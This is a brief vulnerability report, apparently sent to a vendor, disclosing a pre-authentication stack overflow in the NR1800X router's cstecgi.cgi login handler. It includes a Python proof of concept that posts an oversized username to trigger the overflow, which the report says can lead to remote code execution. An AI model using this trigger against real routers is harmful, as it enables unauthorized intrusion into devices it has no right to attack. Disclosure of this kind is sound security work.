Hi, we found a pre-authentication stack buffer overflow at **NR1800X (**Firmware version V9.1.0u.6279_B20210910), and contact you at the first time.

In main function**,** the length of post data is not checked. If the query string is specified as /cgi-bin/cstecgi.cgi?action=login&flag=ie8, one can send a very long post data to overflow the stack buffer via sprintf.

PoC

import requests

url = "<http://192.168.17.220:80/cgi-bin/cstecgi.cgi?action=login&flag=ie8>"
cookie = {"Cookie":"uid=1234"}
data = "username="+"a"*5000
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

The PC register can be hijacked, which means it can result in RCE.